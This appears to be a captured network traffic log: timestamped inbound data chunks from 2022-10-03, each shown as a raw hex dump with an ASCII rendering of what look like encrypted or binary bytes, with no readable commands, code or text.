2022-10-03 14:13:31 UTC	131	IN	Data Raw: 3d 3a 7d 1a 7e b4 b4 24 9e f3 38 12 85 69 05 24 4b 53 bc 59 9e 95 78 89 23 c5 26 6c 91 19 76 2a 70 31 72 57 b3 f4 96 f1 e0 00 28 76 47 e7 a0 30 67 c3 a6 cf 1c 80 7a ed 8b ca bf c1 9d 9c 08 4c b0 19 db 0f 92 d6 b0 30 8e 50 8f be 3c bf 0c b0 60 3b 78 3f d8 95 a3 84 81 f8 8f c3 61 e4 84 01 46 fd b1 3f fc 43 5b bd e5 90 9e 09 22 df b2 cc b7 69 87 44 bd e0 5d 7b 69 b8 e8 4c 8e 43 69 b9 06 16 be 78 fb 3b 5b fa 93 35 20 c5 29 11 89 08 45 e7 37 05 40 68 ec f7 2c db 20 44 dc aa 51 24 58 13 bb bc bd b8 78 87 9d 38 a6 cd 38 4c 39 43 40 d8 1e cd e0 88 9c 37 66 4a 35 ec e8 91 d4 eb b4 73 81 6e 31 96 08 c6 01 6e 39 8a f2 c8 97 d3 c8 a5 4f ba e2 d2 df 68 d5 cd d1 68 db 60 07 ac 65 a8 e8 b3 f6 1f 96 93 c4 56 ad 76 1c f5 a0 04 7f 1d 1f 42 91 21 28 b2 1c bd 04 c3 17 47 91 Data Ascii: =:}~$8i$KSYx#&lv*p1rW(vG0gzL0P<`;x?aF?C["iD]{iLCix;[5 )E7@h, DQ$Xx88L9C@7fJ5sn1n9Ohh`eVvB!(G
2022-10-03 14:13:31 UTC	132	IN	Data Raw: 9f 49 4f bc ba 1d 45 44 50 bc 09 ea ca 1c df 5f ca ef 0c 92 8b 81 fb 88 c9 1f 4b 05 aa 66 6e 99 20 62 08 ae f9 26 00 2c 3e ce 5a aa 14 80 54 68 78 60 87 ef 71 a9 1a e2 15 fa b1 63 64 8c ec 23 b0 2b 25 76 b3 38 9d 1f dd 07 1b f7 ab 11 b7 e6 2b 0e 51 19 39 3a ab d6 ac 79 1b 34 c2 65 24 be 0c 22 68 69 3d 23 6e 6d 03 31 d4 90 29 59 de a0 05 49 4d 8e 97 b5 40 29 c8 8a 61 3f 75 0a e5 9f 2e e5 75 3e 0c 15 c8 97 a7 5b 38 48 cc 56 4b 03 db e3 ce 65 c5 49 00 58 9d bb 42 f4 5d cc 2c c4 4f f2 64 f2 55 65 0e 2a 92 6b 37 0c 57 61 2f cb 65 aa f7 9d 63 39 0e 26 a2 02 26 f2 16 70 54 9c 9b f5 a3 4b b9 00 30 39 af 6f 7b ad b1 aa f7 6c 9c c1 72 2f 5e 17 6e 5f 1c 5d e8 05 d9 52 a0 f7 5f 9b 66 1c ff f0 9a 89 17 b5 c9 e4 e8 4d c4 74 e4 62 f5 75 30 7a 64 87 f1 16 e3 d5 c4 78 97 Data Ascii: IOEDP_Kfn b&,>ZThx`qcd#+%v8+Q9:y4e$"hi=#nm1)YIM@)a?u.u>[8HVKeIXB],OdUe*k7Wa/ec9&&pTK09o{lr/^n_]R_fMtbu0zdx
2022-10-03 14:13:31 UTC	133	IN	Data Raw: 3d 17 6d e8 f8 ca b7 76 b9 ed 5f 18 cb cc c0 42 78 a1 4a 94 9e 2f 50 bf 36 d6 ad 8b ea 16 30 88 85 df e9 a1 1c 45 7f b4 5d 33 ae 9f 76 ee 5c 4d bd 2b ce ce 3e 38 1a 9c 3a 22 ba 2e 01 af ca e5 33 64 6f 2f a2 15 53 b7 59 9a af 61 73 22 c5 ba 63 3e 75 3f 0b 41 34 52 b5 93 96 98 6b c5 32 2e 78 9c 04 a0 36 4d 65 ab aa 1d 80 67 e5 42 ca bf c7 2d 3b 5b 31 97 39 ed 2e 71 d6 90 49 1a 75 a2 b0 14 b7 14 b1 60 3d 72 cf ac fa a2 9d ad 23 bd c2 67 ce 9c 5a 04 ee 97 1b ef a6 5b bd c5 8d b5 24 33 e6 82 00 4c 68 87 62 ee 68 23 14 70 90 17 6d ba 44 43 3b e2 5c 92 69 d9 3b 8a fb 93 35 9a 77 0a 00 af 36 88 1c 36 05 66 39 60 89 43 c1 08 bb fd 9f 56 0e da f7 f1 90 af 9a 78 54 9c 38 a6 77 82 6f 28 65 7f 2c 36 36 e1 a8 1a 17 e0 34 40 c5 13 94 f4 db 9f f5 ff 9b 15 bb 1e c0 c6 58 Data Ascii: =mv_BxJ/P60E]3v\M+>8:".3do/SYas"c>u?A4Rk2.x6MegB-;[19.qIu`=r#gZ[$3Lhbh#pmDC;\i;5w66f9`CVxT8wo(e,664@X
2022-10-03 14:13:31 UTC	135	IN	Data Raw: 2b 1e f0 5f d0 22 d6 59 de 81 f1 64 24 2b 9f f8 fe 49 57 52 79 be ac 59 f2 bd 1e 28 70 a3 a3 f0 49 ec 56 73 cc 30 a9 7f 76 21 10 ba 23 71 fd 77 bc aa 32 39 72 05 6c f8 88 b1 2f 6b 65 07 bd 29 4d e1 48 cf 44 e2 0b 07 ba 76 aa 7d f0 8c 98 35 6e 8b 6f 6b b9 78 f9 2d 83 71 25 0d 37 19 ee 02 8b b8 8b 74 36 77 7b af 0b 79 81 e7 c9 93 82 f4 e4 1a e7 cd 29 b5 0b 7c ed 96 15 15 1c d0 1f 3c d7 f2 30 70 ed 0b 69 5e 14 11 de 8a fe 51 52 9d 4c 87 e6 5a d5 2d 29 6d 49 67 b8 4b 40 8b 32 d9 8a 0e 79 84 81 d1 42 6d 09 98 a2 68 cc e1 71 66 15 f1 5e 0c e0 41 e0 55 36 2d 4e c9 0d 82 ec 0c 43 fe 7c 6a 58 da c3 25 4e 4a 59 1c 70 79 ad 6a 09 76 4a 54 81 c8 8c 0f d3 58 60 2e 76 09 4e 1a 84 54 6c 30 ec 45 f6 d6 6c 68 19 a8 29 ba 2a c2 e5 3e 8d 7f 1a e3 b0 24 35 d2 21 3e 3c 8f 32 Data Ascii: +_"Yd$+IWRyY(pIVs0v!#qw29rl/ke)MHDv}5nokx-q%7t6w{y)\|<0pi^QRLZ-)mIgK@2yBmhqf^AU6-NC\|jX%NJYpyjvJTX`.vNTl0Elh)*>$5!><2
2022-10-03 14:13:31 UTC	136	IN	Data Raw: 69 c6 0a 93 f8 de 0c b5 b3 ea ee b5 c7 2e 44 c1 ae 5f 2f 18 e4 fc 5e be f9 39 d9 a7 ab e4 09 3d cf 71 3d 33 b8 cc aa 15 f6 12 b0 0a e9 4a f6 e4 74 de 17 2c cd 11 bb 95 f9 96 cb b3 52 b6 92 5e 18 51 73 c8 7d 4c a7 45 eb 9f 2f 70 a1 95 c4 ad 94 eb 1a e3 72 84 d9 c5 09 e4 54 11 b5 59 17 be e1 77 ee c6 f2 b5 17 fa c8 2e 46 1b 9c 1a 5e 65 3c 01 b3 fd 11 1a 9f 68 05 22 41 ba c8 36 9f 8f 54 52 a2 c4 20 46 89 42 34 39 56 15 d2 b4 b3 f4 b6 8b d7 2d 39 4f 43 2d 5b 31 67 e5 ff 43 62 ef 62 c5 74 eb 3e c6 b7 1e ec 06 9c 0b f9 0f f0 d7 b0 30 34 71 b1 af 1a 80 fc 98 9b 3a 58 4f f8 13 dd f2 a8 03 8a e3 e5 cf 06 7f b3 d9 9c 29 fa 87 d9 bc e5 0a 9b 33 20 f9 92 37 93 41 7c 65 c4 ec 77 fd 0f ff 12 4d 8a 65 c0 3a 78 79 25 5d d2 09 98 da 10 34 ba e0 24 3b bc 28 a0 f8 12 2d 9b Data Ascii: i.D_/^9=q=3Jt,R^Qs}LE/prTYw.F^e<h"A6TR FB49V-9OC-[1gCbbt>04q:XO)3 7A\|ewMe:xy%]4$;(-
2022-10-03 14:13:31 UTC	137	IN	Data Raw: a0 23 69 15 02 d0 26 59 82 b2 5d ad 82 15 aa 52 ef 79 06 24 fd 91 67 6a 91 c1 b5 ee cd a8 3b 51 e6 13 ea 0b 3c 3d 06 5e 68 1c 0f 94 be f4 d8 c9 b5 e7 9a ec f7 3b 3e 68 55 c2 0a 32 78 f6 7c da e6 5c 6e 18 86 95 68 01 57 59 1b 37 7c df 36 1d 25 34 84 83 55 68 a0 46 53 74 3b 81 84 68 2c 3e 6b a4 0f 94 5c 3a d0 7d 6f 73 01 4c c4 ac 9c 3d d7 60 7d ae 0f 6d 67 1d df 44 c2 d1 18 92 8d b4 71 de 5d 1f 4b 07 a0 e9 11 f6 21 f8 29 a3 4c 01 20 25 a5 eb 77 98 9e ab f3 69 67 7b 8f c5 65 a9 1c d7 99 ac 25 63 64 8e e6 af cf 44 24 ec 92 35 27 38 fd 0d 80 d2 86 23 56 cd 83 0f 4e 14 31 1a bf d6 aa 4c 96 62 56 65 24 bc 06 af 17 06 3c b9 4f 60 b8 16 f4 9b b2 7c f3 92 f7 62 e4 8f 88 a2 48 34 dc 8a 67 0a c1 5c 71 9f 2e e7 7f b0 73 7a c9 0d 86 56 83 6f ec 5a d0 26 f6 d2 03 4e 6f Data Ascii: #i&Y]Ry$gj;Q<=^h;>hU2x\|\nhWY7\|6%4UhFSt;h,>k\:}osL=`}mgDq]K!)L %wig{e%cdD$5'8#VN1LbVe$<O`\|bH4g\q.szVoZ&No
2022-10-03 14:13:31 UTC	138	IN	Data Raw: 55 d7 cc c1 49 2c 9b ff c0 a7 d0 2b f3 ae 45 02 fd 85 81 1d ad ad 40 95 e1 53 5b dd de c2 eb 43 7d 97 d7 b1 2c 30 91 20 99 e1 fb 26 6e 54 60 f4 cd 9c ce 20 58 44 4e 09 9e 96 f9 2c 7e 92 8c fc 95 1a 26 60 e9 4a 51 07 e5 cf 7a 26 fb 7a 47 b2 86 d6 e1 29 f1 54 54 10 bb bb c1 c6 32 d6 de 91 80 fb 6a 1a ec 57 f6 f4 05 36 16 91 15 ad 7f b4 dc 57 96 e8 7f d5 50 e9 ed ca 7b ac 77 b3 be e2 71 81 38 f6 43 83 f4 3e d4 95 ad 22 c2 23 64 00 f8 ca 36 12 9e 9a 56 20 c7 68 90 a0 cd c3 1c 1f 3a 52 1b 7e b4 0e 0b ab e2 1e 2d 6d 41 fe 25 6b 3a 9c db e0 e0 51 72 26 e5 ef 47 13 67 83 0e 5d 24 74 95 7c f5 96 6b e5 3e 21 50 67 12 88 cb 66 e3 d3 ef 9a fe 0c c4 70 cf 9f 17 b6 1e 76 b9 94 34 cd 09 51 06 b1 30 14 55 b6 b7 1a 9f f0 b9 48 c0 59 49 d4 bf 21 e3 c6 02 8e c7 47 1f 07 7f Data Ascii: UI,+E@S[C},0 &nT` XDN,~&`JQz&zG)TT2jW6WP{wq8C>"#d6V h:R~-mA%k:Qr&Gg]$t\|k>!Pgfpv4Q0UHYI!G
2022-10-03 14:13:31 UTC	140	IN	Data Raw: ad 11 aa aa 9a d3 02 93 d9 dc c6 9e 54 cc c8 34 82 5c 43 eb a4 e6 53 4e 6e 82 2c a2 6d 98 8f 65 32 95 f0 e3 59 15 af 7a 8f 39 1b 29 8d 3f 48 51 d4 24 d2 59 32 fb 61 79 33 26 02 84 58 82 92 5e 91 af 07 90 5a b7 79 06 22 f7 9f 0c 05 90 de bd e6 c5 a8 3b 57 56 b0 b9 75 1b 1d f1 7f cc 1d 2f 0b 3d d1 f5 c2 bb 3c 3f ed f1 11 9c 8e 2f c3 0a 29 78 2a 86 db e6 c0 61 b3 e9 dc 49 f5 52 79 be 16 de c6 ac 38 13 0e 59 a2 f0 6f 8a c4 0d a3 2f 81 80 57 d4 17 90 a5 95 b7 5b ad 88 32 9b 72 05 6c 42 0a 85 3d 4d 5e 78 47 28 4d c7 36 5d 3a 8d 15 0d 96 ad 5d 7c f6 a6 84 6e 2c 9b 49 4f 6f 21 f8 2d a3 47 19 20 25 24 e6 a1 8b b8 8d 7e ea 19 14 ae 14 74 89 eb c9 93 84 44 47 49 99 ea 09 46 2a 25 ec b6 a4 96 39 fd 13 32 0c aa 31 76 c7 ad 70 21 15 11 c5 8a 2e ab 53 9d d0 88 49 36 9c Data Ascii: T4\CSNn,me2Yz9)?HQ$Y2ay3&X^Zy";WVu/=<?/)xaIRy8Yo/W[2rlB=M^xG(M6]:]\|n,IOo!-G %$~tDGIF%921vp!.SI6
2022-10-03 14:13:31 UTC	141	IN	Data Raw: 1a a3 18 99 25 ec 20 f1 cd 91 52 59 67 38 86 c1 81 ec a9 bd 11 63 02 83 7f cd 1c 7f e1 63 58 c9 1f 7b b8 bc 77 e5 04 60 a9 de 41 b3 83 43 7a 83 6d 27 e4 a5 1f 4c ca dc e9 28 08 b6 e8 cc 01 b7 46 f2 ae 61 94 2c 84 81 01 1f 73 6c 87 c1 59 13 a2 b1 c3 cb 97 4a 8d d5 ae 21 82 4f 0c 88 c1 f1 ba 12 3b 61 d4 75 a7 05 21 45 6c 2f 2d b3 82 f5 8e cb fc 8d fc b1 e7 2a 62 e9 55 c4 0a 33 df 5c 00 ca fa 39 dd a7 15 fe 09 3d 4b 7c eb 20 9e ea fd 92 88 7d 91 80 ff 6a ea f9 57 f6 76 08 e0 05 b7 33 9b fb ca b3 76 5d f7 5f 18 4e c8 c5 ab 5f 81 63 bf 1c 51 1f 80 38 d2 8d 89 f6 3e cb 13 a0 f4 d2 05 42 37 7c b4 59 33 72 85 76 ee dc 40 6b 3b e8 e8 24 bb 64 f3 1b 7e b0 0e 1f b1 e2 1e a8 41 44 14 02 4b 22 b4 59 9e af a0 69 22 c5 39 6e e8 66 19 2d 5a b7 2c da b2 f4 92 4b da 2f 39 Data Ascii: % RYg8ccX{w`ACzm'L(Fa,slYJ!O;au!El/-*bU3\9=K\| }jWv3v]_N_cQ8>B7\|Y3rv@k;$d~ADK"Yi"9nf-Z,K/9
2022-10-03 14:13:31 UTC	142	IN	Data Raw: d3 b8 c1 ee a5 09 a7 e2 d2 e2 c4 24 cc d1 71 ec ce 82 c2 64 ae c6 11 b7 72 97 93 5a 53 68 64 3a d5 05 23 52 0c 19 ca 64 21 28 ad 36 34 f5 c2 17 5b 93 4e e8 81 b4 39 55 8b da d7 28 15 3d 96 ea 8c 76 cc 79 37 82 5c f9 7c 94 f4 75 71 93 ab d7 a3 4d e2 bc e7 4c e5 ec cb a6 34 ee 7e a5 bb ff 63 a1 2e 6a 51 67 27 d2 59 88 60 51 68 15 1b d8 7e 59 82 b4 ed 0e d1 68 8d 72 48 58 44 26 dd 1d e8 4f bc cc 9f e6 74 ab 3b 57 ec 50 89 64 3d 22 08 56 37 1c 0f 92 0e 57 8b b4 92 c7 3a cd b4 39 1e f0 da e7 27 3f 7e fe c4 d9 e6 5a 64 51 e5 fa 69 1e 58 51 45 37 7c d9 86 ba 76 49 a3 a3 f4 49 e4 44 73 cc b4 a4 a9 66 07 36 d4 a7 0f 92 56 66 b3 12 6e 6f 2d 97 63 ad 9a 17 cf 3b 3f bd 29 49 e1 59 dd 44 e2 8e 28 bf 9c 8d 5d b3 a4 1e 4b 21 6a 72 6f 99 3c d0 d6 82 eb 06 0a a3 41 a1 5b Data Ascii: $qdrZShd:#Rd!(64[N9U(=vy7\\|uqML4~c.jQg'Y`Qh~YhrHXD&Ot;WPd="V7W:9'?~ZdQiXQE7\|vIIDsf6Vfno-c;?)IYD(]K!jro<A[
2022-10-03 14:13:31 UTC	143	IN	Data Raw: 98 b4 4e 92 c0 e8 0a 53 0f 44 7f 79 40 e3 2d 02 30 81 f1 75 06 30 88 ff f0 98 83 9a ca a6 e5 72 6c c9 00 c0 42 fa ee 15 57 55 b5 dd 70 e1 ca df 70 04 3f 58 78 a6 90 e3 98 3a e0 22 88 b2 fe 55 73 e5 66 8e c2 81 e8 13 80 3e 72 24 39 3d e2 0e 59 e1 14 7b c9 1f 45 3b 5c 76 e5 1d 41 03 5b 2f b2 85 6d d8 95 00 26 e4 3b 1a 78 d9 fa c9 da 2f 9b f9 ca 56 8f 44 f2 b0 69 d9 36 84 87 37 b1 f6 02 86 c7 77 b1 b5 dc c2 cb 09 4f ba c5 88 01 71 68 21 99 c7 ae 81 10 3b 7e fa e1 47 04 21 5e 6e 52 52 dc 85 df 08 95 f9 8e fc b5 5d 14 4d fb 73 7e 45 1c ce 7a 00 5c d9 39 dd 98 da cd f2 3c 55 52 3a a3 e0 83 d6 14 f2 32 fb 82 fb 4a 6c de 7a e7 ca 0d a6 15 91 13 a7 60 eb b3 56 8b c4 a4 19 51 ef c7 d6 20 ee 64 95 9a 0f 1c 83 38 d6 37 b1 d9 2c ed a9 e9 db c3 23 42 8a 5f b4 59 0c 81 Data Ascii: NSDy@-0u0rlBWUpp?Xx:"Usf>r$9=Y{E;\vA[/m&;x/VDi67wOqh!;~G!^nRR]Ms~Ez\9<UR:2Jlz`VQ d87,#B_Y
2022-10-03 14:13:31 UTC	145	IN	Data Raw: 43 c1 08 bb fd 26 55 0e da f7 f1 90 af 9a 78 ed 9f 38 a6 77 73 42 28 65 7f 28 36 36 e1 a8 1a 17 e0 34 40 c5 13 94 f4 60 9c f5 ff 9b 15 bb 1e c0 c6 e3 3b 8a 68 cd 3e e2 ee 85 b7 b3 ca 29 fe ec d9 e7 57 09 a9 49 fc a9 45 20 c0 31 88 ea b2 be d2 50 65 f8 1e f5 3a 01 df 2f 39 62 66 2d 00 49 3d 1c 08 e9 95 23 d6 c9 96 ea 95 b6 53 ab 9a 4f 0d 38 b6 95 e7 11 52 ec 39 15 1b 7f d9 ce 91 dc 8e 6f 9f 85 06 24 33 8b 97 65 36 aa 7d c9 a2 14 35 59 88 a9 43 66 1c 3d 4c 71 06 be f1 59 a8 c1 46 40 ee 07 f0 83 72 04 cc a8 89 af 03 ac e3 4e 78 06 be f8 30 60 4c b1 4f bb c6 36 89 9e 74 cc 95 8b 40 15 c6 03 7e ca 37 89 ea 4b d0 f5 df b3 55 3c ed f7 a1 3b dd 52 e4 2a bf 5a de 87 fb 2f 79 44 9e e7 ea 41 fa 52 79 b8 1c fa a1 c3 39 08 22 82 30 f2 69 a0 dc 56 e1 3c a7 a4 e4 23 16 Data Ascii: C&Ux8wsB(e(664@`;h>)WIE 1Pe:/9bf-I=#SO8R9o$3e6}5YCf=LqYF@rNx0`LO6t@~7KU<;R*Z/yDARy9"0iV<#
2022-10-03 14:13:31 UTC	145	IN	Data Raw: e1 9d 1a 78 9e a8 7f dc e3 1e 36 44 cb 07 24 6b a6 93 74 8c a9 70 d0 20 c5 20 66 d5 43 19 2b 6f 1d 7a 4e b2 f4 90 41 47 53 56 51 67 01 80 93 65 e3 d5 5f 39 ad 72 e3 50 68 bd c7 b7 3e 98 07 b1 19 c8 07 8a d7 b0 36 3e f7 dc c0 1b 9f eb 90 c4 39 58 49 48 b0 8e 8c 8f 23 2a c1 67 ce 26 90 0d fc b1 2c f4 5c 5a bd e3 20 3d 5a 5c f8 92 2c 97 cc 85 64 c4 70 78 56 63 b6 33 e8 8c 45 43 1b 88 5d bf 78 e0 14 96 01 92 35 bc ca 82 7e c0 29 a0 e3 17 a3 62 13 e6 6d 09 ed 1a 99 fd 0c 55 0e da 4d 2b 99 bd bc 47 6f b5 c3 a7 57 1b 4b ae 1b 0f 3f 1e c9 c0 0f 1e 3d 66 d0 0a e9 01 b6 f4 4a 9c f5 ff 21 3d b3 0c e6 f9 72 11 71 69 ed bc eb 68 fb c7 bb e2 d6 df 44 dd cd d1 ed e3 65 ee 8b 45 06 c0 31 88 50 be b6 c0 76 5a 6b 34 0e 3b 21 54 26 bf 1c 16 20 28 b6 1c b5 0c c3 17 c7 9c e5 Data Ascii: x6D$ktp fC+ozNAGSVQge_9rPh>6>9XIH#*g&,\Z =Z\,dpxVc3EC]x5~)bmUM+GoWK?=fJ!=rqihDeE1PvZk4;!T& (
2022-10-03 14:13:31 UTC	147	IN	Data Raw: 6e 62 ad bc 7a 6a 45 50 a0 01 b6 c0 1c d9 6e 60 6a 62 93 8d af 5d 3f a4 1e 4b 9b af 42 7e bf 00 31 2f 83 eb 20 6d 02 3f ce 47 a2 43 8a 54 6e 4d fd d1 7b 71 a9 18 e8 59 86 de 62 fe ad e1 3b 97 0b ef ee 96 15 af 6d da 0d 1a e8 a5 19 8b ec 2b 08 64 92 6f ae ab d6 ae 73 56 48 ad 64 be 9f 01 3b 4f 49 f6 bb 4b 40 31 75 d3 9b 28 46 c8 a8 2a 43 4d 88 a2 24 16 bd c8 8a 63 35 3b 76 8a 9e b4 c4 78 20 2b 35 04 0f 82 76 09 16 cb 5a 4a 1c ce eb de 6f c5 4f 36 f2 18 d5 43 f2 73 6a 9f a9 4e f2 fa f7 75 75 28 0a c5 4c 1a 1e 51 cc 05 ca 65 bd ff 97 69 39 08 13 38 54 b2 f2 16 72 5e d4 e7 9a a2 d1 98 0d 2f 1e 8f a1 e3 88 9c 98 5f 6b 92 c0 6a 07 85 1f 62 59 36 c0 9d 42 23 53 a4 d1 ba 1f 18 73 64 d5 b3 b8 3e 94 06 e6 72 68 c9 f6 e5 42 fa 63 18 81 45 93 fb 3c 61 b4 b0 51 6c 1a Data Ascii: nbzjEPn`jb]?KB~1/ m?GCTnM{qYb;m+dosVHd;OIK@1u(F*CM$c5;vx +5vZJoO6CsjNuu(LQei98Tr^/_kjbY6B#Ssd>rhBcE<aQl
2022-10-03 14:13:31 UTC	148	IN	Data Raw: 91 0e af 02 cb b3 50 bc 6a 21 77 50 e9 e9 70 ae 83 65 95 04 0a 5d 93 1e f6 5d 96 f4 3e eb 0c ad d9 c3 3c 6c 02 85 b5 59 15 b4 18 08 81 c7 68 94 1a 19 ec 0e 39 80 b9 37 6c 92 0e f0 b1 e2 1e 12 f7 41 05 24 74 37 9e a2 9f 8f 56 58 a4 bb 4f 47 13 63 39 d9 72 35 52 2f 96 d9 84 4d e5 df 3b 50 67 25 3e 18 67 e3 ca fc 34 7b 62 c5 76 e1 39 b9 d8 1f 76 27 91 ea dd 2f 71 4c 95 1d 06 53 82 5c 18 9f ef 90 b7 13 58 49 cd 85 8b 66 a8 03 88 e9 e1 b0 69 7e 29 f8 91 cf de a7 5b 27 c0 27 a9 02 13 0d 90 28 b7 49 60 4c c4 ea 42 75 59 6b 12 4d 88 6f c5 45 17 78 bf 7c df ee bc fa 93 af 9f cd 16 26 8f dd a2 e7 37 25 95 3b e6 f7 33 ca 20 44 dc aa 51 24 58 13 bb bc bd b8 78 97 9f 38 a6 cd 38 4c 39 43 40 c8 1c cd e0 88 e3 15 66 4a 31 ec e8 91 d4 eb b4 73 81 6e 31 96 08 c6 11 6c 39 Data Ascii: Pj!wPpe...<lYh97lA$t7VXOGc9r5R/M;Pg%>g4{bv9v'/qLS\XIfi~)[''(I`LBuYkMoEx\|&7%;3 DQ$Xx88L9C@fJ1sn1l9
2022-10-03 14:13:31 UTC	149	IN	Data Raw: c0 62 d9 58 8e aa f5 7c 21 71 62 f6 fe 62 08 09 9d a3 fa cc 1f 9a 91 6f 1b 92 a5 80 3e 07 43 d4 14 f2 dd 35 99 3b c3 3d 79 4f da eb 57 de 7a fa f6 56 20 20 55 39 62 b9 8b 45 09 3b 3c ec 7c 50 92 42 84 2f 9c 57 61 ca ea c4 07 8e cb 61 2c 5e c7 07 0a ec 4b 8e 58 fe 87 45 69 53 4d b7 27 ee db c6 01 0a 01 1c a0 11 6c 96 17 d5 8c 80 d3 6f 58 bb df 20 86 01 19 c3 b9 2d a3 03 dd 3d 01 e7 a9 2f 75 f5 39 0f 58 08 30 e6 80 f6 91 6d 83 4a 98 57 10 98 06 18 65 57 17 93 7c 70 23 16 e3 b0 08 64 e7 a5 e0 65 bb 76 54 6a b4 09 10 57 84 c6 27 a7 43 4f ef 20 b3 db c0 c2 25 f1 6d 88 c4 82 72 81 8c d1 08 25 cc 97 28 a5 fc 8c 82 58 b4 18 9a aa b3 49 e5 1d 8a 2c a7 d2 fc da f3 fd fc e0 91 9b f8 16 bd 60 13 ef f4 bd 8c ea 3e b3 52 7c c8 ab b7 95 75 12 34 8e 09 b6 a7 b3 36 ea 67 Data Ascii: bX\|!qbbo>C5;=yOWzV U9bE;<\|PB/Waa,^KXEiSM'loX -=/u9X0mJWeW\|p#devTjW'CO %mr%(XI,`>R\|u46g
2022-10-03 14:13:31 UTC	151	IN	Data Raw: 7e 9a 01 0b 6c a3 13 60 65 1d 56 21 e8 bf 80 11 19 6d 59 84 17 78 87 b3 7c 92 d5 98 a2 4d 73 07 03 47 3f 90 dd e0 54 b0 4c c0 c5 a8 1f a6 9c 33 90 c5 12 cf 11 d9 69 f0 b6 99 e5 3e e0 9d 65 62 3c 84 9c 42 48 f4 16 f5 e6 5b 02 f5 43 ad b3 8d f3 3b d5 87 9a c7 d6 2f 70 2f 38 f6 55 17 97 8d 2b 9a b2 53 8d 33 fb d9 17 3a 09 88 1a 64 8c 1c 69 df d8 3e 0c 4d 42 34 41 76 3e 90 69 ba 89 5f 45 09 96 75 5d 2b 5a 03 2b 67 0a 69 84 c6 7b 49 ac 1e e7 ff 8e ef fb 47 f1 b2 24 2e 35 d6 48 84 1a ac 1a 69 0b 07 a6 82 f6 6f e6 38 ed f2 1a 52 d4 f8 db 08 57 f8 6f 08 59 93 98 83 89 36 7b 59 59 64 f2 63 03 9d 39 fa 86 c8 5c 2b a5 15 39 df 27 22 9e 3d b8 fb 6f 1e ba 32 e6 12 a5 04 78 c7 f0 e0 4b 99 fd 07 df dc 8f f8 f7 2e e1 62 a5 01 42 29 c1 5a 03 be b5 1b c6 15 49 95 ae cb a0 Data Ascii: ~l`eV!mYx\|MsG?TL3i>eb<BH[C;/p/8U+S3:di>MB4Av>i_Eu]+Z+gi{IG$.5Hio8RWoY6{YYdc9\+9'"=o2xK.bB)ZI
2022-10-03 14:13:31 UTC	152	IN	Data Raw: 2f 26 50 62 bb c3 21 d6 e9 a2 f4 e2 54 c6 33 1a 3a 6b 47 99 4c 35 40 de b7 c4 a9 7a cd 53 31 a0 e1 d6 0a 5f 5d 68 10 8b 50 65 ef 49 ed ac a8 f4 b6 6a 97 85 42 6e f4 5f d9 43 01 45 dd 9d ca e0 48 60 94 fa f3 69 15 5c 72 e7 0a 71 cc a6 39 1e 24 8f 80 f4 78 a7 2c 7c e5 13 ae 80 54 01 31 a7 84 05 bb 5c 9d 9f 29 69 7e 2f 57 4f d1 85 0e 6a 74 52 86 1b 70 e4 d8 1d 9e 6b 8c e4 5b 4e 7b b7 24 27 f1 82 c6 73 86 b8 44 f0 36 fc 56 24 87 cf e6 eb 0c 99 57 63 66 83 8d 81 91 55 f4 98 58 c3 0b 7a 70 36 8b 88 67 3a e7 41 d0 cd 15 79 c4 75 dd 1e f2 e2 20 5f af fa 69 ab 8e c0 bf 8e 4c 3c 46 17 f6 13 da 3a f7 b0 1e 80 a4 f3 e7 e0 0f d9 c4 81 a2 6c 00 aa fc 7b 0b 77 e3 f5 2d 2b 3c e8 7d 67 3b cf bf 6e fb 22 23 85 1f ce 8f a4 a6 57 b4 36 c2 9f d5 19 32 13 44 85 9e 6f 30 84 02 Data Ascii: /&Pb!T3:kGL5@zS1_]hPeIjBn_CEH`i\rq9$x,\|T1\)i~/WOjtRpk[N{$'sD6V$WcfUXzp6g:Ayu _iL<F:l{w-+<}g;n"#W62Do0
2022-10-03 14:13:31 UTC	153	IN	Data Raw: b2 f5 b7 cf 4e e2 9e 8a 55 c0 30 c1 e8 02 0c 6f a8 ac 31 05 ad 32 ad 95 4e b4 fb 88 e6 f3 bb 32 c7 8e ed 0a 30 33 02 cd b7 84 82 33 1d 36 b6 e5 a1 1e 7f 64 4a cc 3a a5 9a da 13 a3 8b 8a 81 c9 cd 3b 1b 9e 2b 51 40 1b be 7a 50 bb 88 39 b6 e9 a3 88 12 5a 39 24 74 43 f9 8e b7 01 94 01 09 69 61 da 0f 3d 95 3f 21 f9 1e 96 74 c6 46 38 15 66 9a 46 33 8c d7 a9 6d 67 a4 d8 0f e1 19 06 9c ca 4b 84 75 16 5e 3a 85 65 31 3d 1b 71 8a d5 83 d5 68 f4 c9 35 41 a8 4e 17 bb 56 c5 11 1e f4 a4 82 54 b7 ff 36 a3 85 3f 21 bd b6 f0 fa 88 a7 f8 a4 2f d4 05 50 ef fd b5 52 b5 d9 91 f9 8c b2 89 bb aa 39 4e 0e 18 e3 2a df bb a6 96 ef 50 c6 f8 0f 20 5e fa 68 8c 35 e3 5d 2b 2f 51 f8 e0 c0 a9 05 c2 44 08 90 f2 79 59 21 f1 ae 78 d7 a6 f4 33 6e 40 20 8d d9 ec d7 f4 42 da d2 12 8b 57 2e 46 Data Ascii: NU0o12N20336dJ:;+Q@zP9Z9$tCia=?!tF8fF3mgKu^:e1=qh5ANVT6?!/PR9N*P ^h5]+/QDyY!x3n@ BW.F
2022-10-03 14:13:31 UTC	154	IN	Data Raw: 5d 33 f9 ec b5 5c 3b a9 b8 dc 89 4f f4 00 25 88 4c d4 cd aa f5 63 52 88 94 36 b7 12 da 99 78 36 89 f9 cf 94 2c 96 63 bd b6 7e 5b 93 21 4e 75 2c 29 d6 43 b3 de 70 5c 0a 10 fa 87 52 ae 8b f4 af 9a 24 86 46 77 43 ca e6 12 9a b8 bc 53 17 75 16 e3 7b f8 82 06 51 43 ba b8 b9 cc a0 03 d3 ca 48 e6 04 7e 4a 6f 06 82 2d 05 ea f8 3c a4 27 fc da a8 65 2e 73 26 a6 b0 41 0e 10 d9 fd a0 89 68 dc 82 0a 74 fc f2 d2 25 2d 72 e9 2a d9 fe 52 bf 15 0b e4 a3 a1 07 29 da 39 fd 2c 7b be fd e8 83 e8 f3 2e 0f 96 f6 c0 ff 19 b7 d4 41 fe 54 dc 69 8b ae 3c 25 0a d0 54 0f 96 fc be 20 c7 d2 36 97 77 b2 22 58 b9 a2 a0 5b c8 35 f6 df f8 1b 2a 2b 3e e6 52 25 d2 4d 9e cc cd 88 3a 37 d2 91 61 f7 70 38 b9 c1 56 da 69 99 72 60 91 d5 47 33 90 4c 63 6e 43 47 88 f2 95 d9 24 e0 09 da 17 54 c6 62 Data Ascii: 